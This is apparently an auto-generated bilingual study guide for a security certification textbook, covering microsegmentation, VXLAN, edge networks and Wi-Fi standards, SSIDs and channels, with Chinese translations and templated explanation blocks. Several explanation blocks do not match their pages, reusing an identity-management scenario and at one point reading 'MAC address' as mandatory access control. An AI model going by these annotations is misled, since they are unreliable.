Several technologies and concepts contribute to the implementation of microsegmentation, including network overlays/encapsulation, distributed firewalls, distributed routers, and intrusion detection systems (IDSs)/intrusion prevention systems (IPSs): Network overlays/encapsulation: Network overlays involve creating logical networks on top of an existing physical network. Encapsulation is a technique where data packets are wrapped in an additional layer, providing a form of isolation. Overlays and encapsulation support microsegmentation by creating isolated communication channels between

中文直译 / 整理

作为独立的逻辑实体运行。 虚拟域允许多个客户或部门使用同一物理网络设 备,同时保持逻辑隔离。 这在防火墙设备中很常见,因为不同组织或业务单 元需要专用的防火墙策略。 私有局域网或内网、筛选子网和外网都是网络分段的类型。 网络分段的另一个示例是VPC。 虚拟私有云(VPC)是由云计算服务提供商 提供的虚拟化网络基础设施。 它允许用户在公有云环境中创建和管理隔离的、 逻辑上分段的网络。 VPC使组织能够在云中以安全且专用的空间托管其应用 程序和资源,同时保持对网络配置的控制。 网络分段概念的演进是微分段。 微分段 是一种网络安全部署策略,涉及将网络 划分为小型、隔离的分段,以增强安全性并最小化安全漏洞的潜在影响。 微分 段可能创建小至单个设备的分段,例如高价值服务器,甚至客户端或终端设备。 这种方法侧重于在网络内对单个工作负载、应用程序或设备应用细粒度的安全 控制。 所有区域之间的通信都会被过滤,可能需要身份验证,通常需要会话加 密,并可能受到允许列表和阻止列表控制(即授权)的监控和记录。 在某些情 况下,与本地分段外部实体通信时,通信必须进行封装以实现外发。 这类似于 使用VPN访问远程网络。

微分段是实现零信任的关键要素(见第8章,“安全模 型、设计与能力的原则”)。 实现微隔离涉及多种技术和概念,包括网络覆盖/封装、分布式防火墙、分布式 路由器以及入侵检测系统(IDS)/入侵防御系统(IPS): 网络覆盖/封装:网络覆盖涉及在现有物理网络之上创建逻辑网络。 封装是 一种将数据包包裹在额外一层中的技术,提供了一种隔离形式。 覆盖和封 装通过在

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:认证回答“你是不是你声称的那个人”。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

认证:认证是验证“你是不是你声称的那个人”。

授权:授权是认证之后决定你能访问什么、能做什么。

加密:加密把内容变成未授权者看不懂的形式。

ISO:ISO 是国际标准化组织,常见安全管理体系如 ISO 27001/27002。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“认证:证明身份”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

密码、令牌、生物特征、多因素认证都服务认证。

认证成功不等于什么都能做;权限仍要单独授权。

加密主要保护机密性,也可配合签名、哈希支持完整性和真实性。

ISO 偏标准和管理体系。

Step-by-step、SOP 常对应 procedure。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
认证 认证是验证“你是不是你声称的那个人”。
授权 授权是认证之后决定你能访问什么、能做什么。
加密 加密把内容变成未授权者看不懂的形式。
ISO ISO 是国际标准化组织,常见安全管理体系如 ISO 27001/27002。
程序 程序是一步一步怎么做。
防火墙 防火墙根据规则控制网络流量进出。
入侵检测系统 IDS IDS 负责发现可疑行为并告警,一般不直接阻断。
入侵防御系统 IPS IPS 可检测并主动阻断恶意流量。
学习单元 47 / PDF P765

政策、标准、程序、指南

高层原则、最低要求、操作步骤、建议做法要分清。

教材原文段落

different segments. This helps in preventing unauthorized access to data by encapsulating it within specific overlays. Distributed firewalls: Traditional firewalls are typically placed at the network perimeter. Distributed firewalls, on the other hand, are implemented at various points within the network, closer to individual workloads or devices. These firewalls are also called internal segmentation firewalls (ISFWs). Distributing firewall capabilities across the network means that security policies can be enforced at a more granular level. Each workload or segment can have its own firewall rules, allowing for customized security controls.

Distributed routers: Similar to distributed firewalls, distributed routers are deployed at various points within the network rather than being centralized. Distributed routers enable localized routing decisions and help control the flow of traffic between different micro-segments. This approach enhances network efficiency and provides more control over routing at a finer granularity. Intrusion detection system (IDS)/intrusion prevention system (IPS): IDS monitors network and/or system activities for suspicious behavior or security policy violations. IPS goes a step further by actively preventing or blocking identified threats.

Deploying IDS/IPS at various points within the network allows for real-time detection and prevention of security threats. These systems contribute to the proactive security posture of micro-segmented environments. Micro-segmentation is a powerful security strategy, especially in the context of modern cybersecurity, where organizations seek to enhance their defenses against advanced threats and minimize the impact of security incidents. Virtual Extensible LAN (VXLAN) is an encapsulation protocol that enables VLANs (see Chapter 12) to be stretched across subnets and geographic distances.

VLANs are typically restricted to Layer 2 network areas and are not able to include members from other networks that are accessible only through a router portal. Additionally, VXLAN allows for up to 16 million virtual networks to be created, whereas traditional VLANs are limited to only 4,096. VXLAN can be used as a means to implement micro-segmentation without limiting segments to local entities only. VXLAN is defined in RFC 7348.

中文直译 / 整理

不同段之间创建隔离的通信通道来支持微分段。 这有助于通过将数据封装在特 定覆盖中,防止未经授权访问数据。 分布式防火墙:传统防火墙通常部署在网络边界。 而分布式防火墙则在网 络内的多个位置实现,更接近各个工作负载或设备。 这些防火墙也称为内 部隔离防火墙(ISFW)。 将防火墙功能分布到整个网络中,意味着安全 策略可以在更细粒度的级别上执行。 每个工作负载或网段都可以拥有自己 的防火墙规则,从而实现定制化的安全控制。 分布式路由器:与分布式防火墙类似,分布式路由器在网络内的多个位 置部署,而非集中部署。 分布式路由器支持本地化的路由决策,并有助 于控制不同微隔离段之间的流量流向。 这种方法提升了网络效率,并提 供了更细粒度的路由控制。 入侵检测系统(IDS)/入侵防御系统(IPS):IDS用于监控网络和/或系 统活动,以发现可疑行为或安全策略违规。 IPS则更进一步,主动阻止或 拦截已识别的威胁。 在网络内的多个位置部署IDS/IPS,可实现对安全威 胁的实时检测与防御。 这些系统有助于增强微隔离环境中的主动安全防护 能力。

微分段是一种强大的安全策略,尤其在现代网络安全背景下,组织希望通过该 策略增强对高级威胁的防御能力,并最大限度地减少安全事件的影响。 虚拟可扩展局域网(VXLAN)是一种封装协议,可使VLAN(参见第12章) 跨越子网和地理距离扩展。 VLAN通常被限制在第2层网络区域内,无法包含仅 通过路由器入口可访问的其他网络中的成员。 此外,VXLAN允许创建多达 1600万个虚拟网络,而传统VLAN仅限于4096个。 VXLAN可用作实现微分段 的手段,且不限制分段仅限于本地实体。 VXLAN在RFC 7348中定义。

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:高层原则、最低要求、操作步骤、建议做法要分清。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

授权:授权是认证之后决定你能访问什么、能做什么。

政策:政策是高层原则,说明必须遵守什么。

防火墙:防火墙根据规则控制网络流量进出。

入侵检测系统 IDS:IDS 负责发现可疑行为并告警,一般不直接阻断。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“政策、标准、程序、指南”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

认证成功不等于什么都能做;权限仍要单独授权。

Policy 高层、强制、稳定;Procedure 具体步骤。

防火墙不是万能;它常与 IDS/IPS、分段、日志一起使用。

检测是 IDS,主动阻断更像 IPS。

IPS 放在线路中,误报可能影响可用性。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
授权 授权是认证之后决定你能访问什么、能做什么。
政策 政策是高层原则,说明必须遵守什么。
防火墙 防火墙根据规则控制网络流量进出。
入侵检测系统 IDS IDS 负责发现可疑行为并告警,一般不直接阻断。
入侵防御系统 IPS IPS 可检测并主动阻断恶意流量。
学习单元 48 / PDF P766

第 766 页学习单元

这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

教材原文段落

Edge Networks An edge network is a carefully designed data architecture that strategically allocates computing resources to edge devices within a network. This design helps distribute processing power demands away from central servers, empowering the devices to handle a significant portion of the processing workload. Edge networks are designed to bring content, services, and applications closer to the users to reduce latency and improve performance. Edge network ingress points are often strategically located at the edge of the network infrastructure to efficiently bring in data or content from external sources, ensuring a responsive and low-latency user experience.

Edge network egress points are strategically positioned to efficiently direct traffic from the network to external destinations. This helps optimize the flow of data and content to ensure a seamless and responsive user experience. Edge network peering refers to the process of establishing direct interconnections between edge networks, allowing them to exchange traffic directly without relying on intermediaries. The objective is to optimize the exchange of data, content, or services between different edge networks, leading to improved performance, reduced latency, and enhanced efficiency.

Wireless Networks Wireless networking is widely implemented because of the ease of deployment and relatively low cost. Wireless networks are subject to the same vulnerabilities, threats, and risks as any cabled network in addition to distance eavesdropping and new forms of DoS and intrusion. A wireless network can be referred to as an unbounded network, while a cable-only network can be referred to as a bound network. 802.11 is the IEEE standard for wireless network communications. Various versions (technically called amendments) of the standard have been implemented, many of which offer better throughput, as described in Table 11.3.

Any later amendments that use the same frequency as earlier ones maintain backward compatibility.

中文直译 / 整理

边缘网络 边缘网络是一种精心设计的数据架构,它战略性地将计算资源分配给网络中 的边缘设备。 这种设计有助于将处理负载从中心服务器分散开来,使设备能 够承担大部分处理工作量。 边缘网络旨在将内容、服务和应用程序更靠近用 户,以降低延迟并提升性能。 边缘网络的入口点通常被战略性地部署在网络基础设施的边缘,以高效地从 外部源引入数据或内容,确保响应迅速且低延迟的用户体验。 边缘网络的出口点被战略性地定位,以高效地将流量从网络导向外部目的地。 这有助于优化数据和内容的传输,确保无缝且响应迅速的用户体验。 边缘网络对等互联是指在边缘网络之间建立直接互连,使它们能够直接交换 流量,而无需依赖中介。 其目标是优化不同边缘网络之间的数据、内容或服 务交换,从而提升性能、降低延迟并提高效率。 无线网络 无线网络由于部署简便且成本相对较低而被广泛采用。 无线网络除了面临与 有线网络相同的漏洞、威胁和风险外,还存在距离窃听以及新型拒绝服务 (DoS)和入侵风险。 无线网络可称为无界网络,而仅使用电缆的网络则可称为有界网 络。 802.11是IEEE无线网络通信的标准。

该标准已实施多个版本(技术上称为修 订版),其中许多版本提供了更高的吞吐量,如表11.3所示。 任何使用与早 期版本相同频率的后续修订版均保持向后兼容性。

小白解释

场景先行:员工在家访问公司系统,流量要穿过家庭网络、互联网、防火墙、VPN、服务器。网络安全题就是让你判断问题发生在哪一层、用哪个控制放在什么位置。

这一页真正想让你理解的是:这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

把它放进公司里看,关键不是背定义,而是判断:不分层就会乱选设备:该加密的地方装防火墙,该监测的地方却只做访问控制。

你作为负责人可以这样想:先定位网络层次,再决定是分段、过滤、加密、检测还是阻断。

本页术语用人话说:

标准:标准给出必须满足的最低要求。

程序:程序是一步一步怎么做。

OSI 模型:OSI 用七层结构理解网络通信,从物理层到应用层。

常见误区:不要以为防火墙能解决所有网络问题;它只是控制流量的一类工具。

读完后用一句话复述:如果我是网络安全工程师,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第 766 页学习单元”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是网络安全工程师在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

Minimum level、mandatory requirement 常对应 standard。

Step-by-step、SOP 常对应 procedure。

网络题先定位层次,再判断协议、设备或攻击位置。

排除法提醒:不要以为防火墙能解决所有网络问题;它只是控制流量的一类工具。

本页术语拆解
标准 标准给出必须满足的最低要求。
程序 程序是一步一步怎么做。
OSI 模型 OSI 用七层结构理解网络通信,从物理层到应用层。
学习单元 49 / PDF P767

认证:证明身份

认证回答“你是不是你声称的那个人”。

教材原文段落

TABLE 11.3 802.11 wireless networking amendments AmendmentsWi-Fi Alliance names Theoretical data rates Frequencies 802.11 Wi-Fi 0 2 Mbps 2.4 GHz 802.11a Wi-Fi 2 54 Mbps 5 GHz 802.11b Wi-Fi 1 11 Mbps 2.4 GHz 802.11g Wi-Fi 3 54 Mbps 2.4 GHz 802.11n Wi-Fi 4 600 Mbps 2.4 GHz or 5 GHz 802.11ac Wi-Fi 5 3.5 Gbps 5 GHz 802.11ax Wi-Fi 6/WiFi 6E 9.6 Gbps Between 1 GHz and 7.125 GHz 802.11be Wi-Fi 7 40 Gbps Between 1 GHz and 7.250 GHz; coexists with 2.4, 5, & 6 GHz Wi-Fi 0, 1, 2, and 3 are named by retroactive inference. They do not exist in the official standards or Wi-Fi Alliance documentation.

802.11x is sometimes used to collectively refer to all of these specific implementations as a group; however, 802.11 is preferred because 802.11x is easily confused with 802.1X, which is an authentication technology independent of wireless. Wi-Fi can be deployed in either ad hoc mode (aka peer-to-peer Wi-Fi) or infrastructure mode. Ad hoc mode means that any two wireless networking devices can communicate without a centralized control authority (i.e., base station or access point). Wi-Fi Direct is an upgraded version of ad hoc mode that can support WPA2 and WPA3 (ad hoc supported only WEP).

Infrastructure mode means that a wireless access point (WAP) is required and restrictions for wireless network access are enforced. Infrastructure mode includes several variations, including stand-alone, wired extension, enterprise extended, and bridge. A stand-alone mode deployment is when there is a WAP connecting wireless clients to one another but not to any wired resources (thus, the WAP is on its own). A wired extension mode

中文直译 / 整理

表 11.3 802.11 无线网络修订版 修订版 Wi‑Fi 联盟名称 理论数据速率 频率 802.11 Wi‑Fi 0 2 Mbps 2.4 GHz 802.11a Wi‑Fi 2 54 Mbps 5 GHz 802.11b Wi‑Fi 1 11 Mbps 2.4 GHz 802.11g Wi‑Fi 3 54 Mbps 2.4 GHz 802.11n Wi‑Fi 4 600 Mbps 2.4 GHz 或 5 GHz 802.11ac Wi‑Fi 5 3.5 Gbps 5 GHz 802.11ax Wi‑Fi 6/Wi‑Fi 6E 9.6 Gbps Between 1 GHz and 7.125 GHz 802.11be Wi‑Fi 7 40 Gbps 介于 1 GHz 和 7.250 GHz 之间; 与 2.4、5 和 6 GHz 共存 Wi‑Fi 0、1、2和3是通过事后推断命名的。 它们并未出现在官方标准或Wi‑Fi联盟 的文档中。 802.11x 有时用于统称所有这些具体实现; 然而,更推荐使用 802.11, 因为 802.11x 容易与 802.1X 混淆,而 802.1X 是一种独立于无线的认 证技术。

Wi‑Fi 可以部署在自组网模式(又称点对点 Wi‑Fi)或基础设施模式下。 自 组网模式 指任何两个无线网络设备都可以在没有集中控制机构(即基站或接 入点)的情况下进行通信。 Wi-Fi Direct 是自组网模式的升级版,支持 WPA2 和 WPA3(自组网仅支持 WEP)。 基础设施模式表示需要一个无线接入点(WAP),并且会强制执行无线网络访问限制。 基础设施模式包括多种变体,包括独立模式、有线扩展模式、企业扩展模式和 桥接模式。 独立模式部署是指WAP将无线客户端相互连接,但不连接到任何有 线资源(因此,WAP是独立的)。 有线扩展模式

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:认证回答“你是不是你声称的那个人”。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

认证:认证是验证“你是不是你声称的那个人”。

标准:标准给出必须满足的最低要求。

日志:日志记录系统和用户活动,用于监控、审计和调查。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“认证:证明身份”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

密码、令牌、生物特征、多因素认证都服务认证。

Minimum level、mandatory requirement 常对应 standard。

日志要保护完整性、时间同步和访问控制。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
认证 认证是验证“你是不是你声称的那个人”。
标准 标准给出必须满足的最低要求。
日志 日志记录系统和用户活动,用于监控、审计和调查。
学习单元 50 / PDF P768

第 768 页学习单元

这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

教材原文段落

deployment is when the WAP acts as a connection point to link the wireless clients to the wired network. An enterprise extended mode deployment is when multiple wireless access points (WAPs) are used to connect a large physical area to the same wired network. Each WAP will use the same extended service set identifier (ESSID) so that clients can roam the area while maintaining network connectivity, even while their wireless NICs change associations from one WAP to another. A bridge mode deployment is when a wireless connection is used to link two wired networks.

This type of deployment often uses dedicated wireless bridges and is used when wired bridges are inconvenient, such as when linking networks between floors or buildings. A fat access point is a base station that is a fully managed wireless system, which operates as a stand-alone wireless solution. A thin access point is little more than a wireless transmitter/receiver, which must be managed from a separate external centralized management console called a wireless controller. The benefit of using thin access points is that management, security, routing, filtering, and more are centralized at a management console, whereas numerous thin access points simply handle the radio signals.

Most fat access points require device-by-device configuration and thus are not as flexible for enterprise use. Controller-based WAPs are thin access points that are managed by a central controller. A stand-alone WAP is a fat access point that handles all management functions locally on the device. Securing the SSID Wireless networks are assigned a service set identifier (SSID) to differentiate one wireless network from another. This effectively defines the Wi-Fi network's name. An SSID is used when a single WAP is in use, while an ESSID (extended service set identifier) is used when there are multiple WAPs supporting the same network by name over a larger area.

An independent service set identifier (ISSID) is used by Wi-Fi Direct or in ad hoc mode. The basic service set identifier (BSSID) is the MAC address of the base station (or initiating device in an ad hoc/Wi-Fi Direct network), which is used to differentiate multiple base stations supporting an ESSID. If a wireless client knows the SSID, they can configure their wireless NIC to communicate with the associated WAP. Knowledge of the SSID does not always grant entry, though, because the WAP can use numerous security features to block unwanted access. SSIDs are defined by default by vendors

中文直译 / 整理

部署是指WAP作为连接点,将无线客户端连接到有线网络。 企业扩展模式部署 是指使用多个无线接入点(WAP)将一个大型物理区域连接到同一个有线网络。 每个WAP将使用相同的扩展服务集标识符(ESSID),以便客户端可以在区域 内漫游,同时保持网络连接,即使其无线网卡在不同WAP之间切换关联关系。 桥接模式部署是指使用无线连接将两个有线网络连接起来。 这种部署通常使用 专用的无线网桥,适用于有线桥接不便的情况,例如在楼层之间或建筑物之间 连接网络。 一个胖接入点是一个完全受管理的无线系统,作为独立的无线解决方案运行。 一个瘦接入点仅仅是一个无线发射/接收器,必须通过一个称为无线控制器的独 立外部集中管理控制台进行管理。 使用瘦接入点的好处是,管理、安全、路由、 过滤等功能都集中于管理控制台,而众多瘦接入点仅负责处理无线信号。 大多 数胖接入点需要逐台设备进行配置,因此在企业环境中不够灵活。 基于控制器 的WAP是受中央控制器管理的瘦接入点。 独立的WAP是一个胖接入点,其所 有管理功能均在设备本地处理。 保护SSID 无线网络被分配一个服务集标识符(SSID),以区分不同的无线网络。 这实际 上定义了Wi‑Fi网络的名称。

当仅使用单个WAP时,使用SSID; 而当多个 WAP在更大区域内通过相同名称支持同一网络时,则使用ESSID(扩展服务集 标识符)。 独立服务集标识符(ISSID)用于Wi‑Fi Direct或自组网模式。 基本 服务集标识符(BSSID)是接入点(或自组网/Wi‑Fi Direct网络中的发起设备) 的MAC地址,用于区分支持同一ESSID的多个接入点。 如果无线客户端知道SSID,它们可以配置其无线网卡以与关联的WAP通信。 然而,知道SSID并不总是能获得访问权限,因为WAP可以使用多种安全功能 来阻止未经授权的访问。 SSID默认由厂商定义

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

授权:授权是认证之后决定你能访问什么、能做什么。

入侵检测系统 IDS:IDS 负责发现可疑行为并告警,一般不直接阻断。

强制访问控制 MAC:MAC 由系统根据标签和级别强制决定访问。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第 768 页学习单元”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

认证成功不等于什么都能做;权限仍要单独授权。

检测是 IDS,主动阻断更像 IPS。

政府/军方、机密级别、标签、不可由用户随意改通常是 MAC。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
授权 授权是认证之后决定你能访问什么、能做什么。
入侵检测系统 IDS IDS 负责发现可疑行为并告警,一般不直接阻断。
强制访问控制 MAC MAC 由系统根据标签和级别强制决定访问。
学习单元 51 / PDF P769

认证:证明身份

认证回答“你是不是你声称的那个人”。

教材原文段落

and thus are well known. Standard security practice dictates that the SSID should be changed to something unique before deployment. The SSID is broadcast by the WAP via a special transmission called a beacon frame. A beacon frame allows any wireless NIC within range to see the wireless network and make connecting as simple as possible. This default SSID broadcast can be disabled to attempt to keep the wireless network secret. However, attackers can still discover the SSID with a wireless sniffer since the SSID is still used in transmissions between connected wireless clients and the WAP. Thus, disabling SSID broadcasting is not a true mechanism of security.

Instead, use WPA2 or WPA3 as a reliable authentication and encryption solution rather than trying to hide the existence of the wireless network. Wireless Channels Within the assigned frequency of the wireless signal are subdivisions of that frequency known as channels. Think of channels as lanes on the same highway. In the United States, there are 11 channels defined within the 2.4 GHz frequency range, in Europe there are 13, and in Japan there are 14. The differences stem from local laws regulating frequency management—think international versions of the Federal Communications Commission (FCC).

When two or more 2.4 GHz access points are relatively close to one another physically, signals on one channel can interfere with signals on another channel. One way to avoid this is to set the channels of physically close access points as differently as possible to minimize channel overlap interference. For example, if a building has four access points arranged in a line along the length of the building, the channel settings could be 1, 11, 1, and 11. However, if the building is square and an access point is in each corner, the channel settings may need to be 1, 4, 8, and 11.

If three WAPs are positioned in close proximity, they can be set to channels 1, 6, and 11 without interference since these three channels do not overlap with each other. 5 GHz wireless was designed to avoid this channel overlap and interference issue. While 2.4 GHz channels are 22 MHz wide and 5 MHz apart, 5 GHz channels are 20 MHz wide and 20 MHz apart. Therefore, adjacent 5 GHz channels do not interfere with one another. Furthermore, adjacent channels can be combined or bonded into a larger width channel for faster throughput. Wi-Fi band/frequency selection should be based on the purpose or use of the wireless network as well as the level of existing interference. For external

中文直译 / 整理

因此广为人知。 标准安全实践要求在部署前将SSID更改为唯一值。 SSID 通过 WAP 发送的一种名为 信标帧 的特殊传输进行广播。 信标帧允 许范围内任何无线网卡都能看到无线网络,从而尽可能简化连接过程。 默认的 SSID 广播可以被禁用,以试图隐藏无线网络。 然而,攻击者仍可通过无线嗅 探器发现 SSID,因为 SSID 仍在已连接的无线客户端与 WAP 之间的传输中 使用。 因此,禁用 SSID 广播并非真正的安全机制。 相反,应使用 WPA2 或 WPA3 作为可靠的认证和加密解决方案,而不是试图隐藏无线网络的存在。 无线信道 在无线信号的指定频率内,存在该频率的细分部分,称为 信道。 可以把信道 看作同一条高速公路上的车道。 在美国,2.4 GHz 频率范围内定义了 11 个信 道; 在欧洲有 13 个; 在日本有 14 个。 这些差异源于各地对频率管理的法律 法规——可将其视为国际版的联邦通信委员会(FCC)。 当两个或多个2.4 GHz接入点在物理上彼此靠近时,一个信道上的信号可能会 干扰另一个信道上的信号。 避免这种情况的一种方法是将物理上靠近的接入点 的信道设置得尽可能不同,以最小化信道重叠干扰。

例如,如果一栋建筑内沿 长度方向排列着四个接入点,信道设置可以为1、11、1和11。 然而,如果建筑 呈方形且每个角落各有一个接入点,则信道设置可能需要为1、4、8和11。 如果 三个无线接入点彼此靠近,可以将它们设置为信道1、6和11,而不会产生干扰, 因为这三个信道彼此之间没有重叠。 5 GHz无线设计旨在避免这种信道重叠和干扰问题。 虽然2.4 GHz信道宽度为 22 MHz,间隔为5 MHz,但5 GHz信道宽度为20 MHz,间隔为20 MHz。 因 此,相邻的5 GHz信道不会相互干扰。 此外,相邻信道可以组合或绑定为更宽 的信道,以实现更快的吞吐量。 Wi‑Fi频段/频率的选择应基于无线网络的用途以及现有干扰程度。 对于外部

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:认证回答“你是不是你声称的那个人”。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

认证:认证是验证“你是不是你声称的那个人”。

加密:加密把内容变成未授权者看不懂的形式。

标准:标准给出必须满足的最低要求。

OSI 模型:OSI 用七层结构理解网络通信,从物理层到应用层。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“认证:证明身份”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

密码、令牌、生物特征、多因素认证都服务认证。

加密主要保护机密性,也可配合签名、哈希支持完整性和真实性。

Minimum level、mandatory requirement 常对应 standard。

网络题先定位层次,再判断协议、设备或攻击位置。

RPO 问数据:最多丢到哪个时间点。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
认证 认证是验证“你是不是你声称的那个人”。
加密 加密把内容变成未授权者看不懂的形式。
标准 标准给出必须满足的最低要求。
OSI 模型 OSI 用七层结构理解网络通信,从物理层到应用层。
恢复点目标 RPO RPO 是最多能接受丢失多少时间范围的数据。
学习单元 52 / PDF P770

第 770 页学习单元

这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

教材原文段落

networks, 2.4 GHz is often preferred because it can provide good coverage over a distance but at slower speeds; 5 GHz is often preferred for internal networks because it provides higher throughput rates (but less coverage area), but it does not penetrate solid objects, like walls and furniture. Most of the mesh Wi-Fi (multiple WAP) options are based on 5 GHz and use three or more mini-WAP devices to provide ML-optimized (machine learning– capable) coverage throughout a home or office. The 6 GHz spectrum range supports up to seven 160 MHz–wide channels more than the 5 GHz spectrum.

This is possible due to the fact that the 6 GHz spectrum is a contiguous 1.2 GHz frequency range rather than the multiple noncontiguous ranges in the 5 GHz spectrum. This provides for more top-speed connections than earlier forms of Wi-Fi. Devices that support the1–6 GHz spectrum range are labeled Wi-Fi 6E (as the version without the E only supports 1–5 GHz). However, 6 GHz is even more restricted by obstacles and distance. Conducting a Site Survey Wireless cells are the areas within a physical environment where a wireless device can connect to a wireless access point. You should adjust the strength of the WAP to maximize authorized user access and minimize outside intruder access.

Doing so may require unique placement of wireless access points, shielding, and noise transmission. Often WAP placement is determined by performing a site survey to generate a heat map. A site survey is useful for evaluating existing wireless network deployments, planning expansion of current deployments, and planning for future deployments. A site survey is a formal assessment of wireless signal strength, quality, and interference using an RF signal detector. A site survey is performed by placing a wireless base station in a desired location and then collecting signal measurements from throughout the area.

These measurements are evaluated to determine whether sufficient signal is present where needed while minimizing signals elsewhere. If the base station is adjusted, then the site survey should be repeated. The goal of a site survey is to maximize performance in the desired areas (such as within a home or office) while minimizing ease of unauthorized access in external areas. A site survey is often used to produce a heat map. A heat map is a mapping of signal strength measurements over a building's blueprint.

The heat map helps to locate hot spots (oversaturation of signal) and cold spots (lack of signal) to guide adjustments to WAP placement, antenna type, antenna orientation, and signal strength.

中文直译 / 整理

